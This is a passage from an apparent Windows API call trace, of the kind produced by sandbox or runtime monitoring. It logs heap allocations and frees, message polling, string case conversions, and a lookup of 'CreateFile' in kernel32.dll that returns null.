hHeap=0x8a0000) returned 1 [0186.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.985] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0186.986] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0186.986] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.987] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.987] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.987] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0186.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.987] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.987] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0186.987] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0186.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.988] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0186.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0186.991] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.994] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd378 [0186.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.994] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.994] RtlAllocateHeap 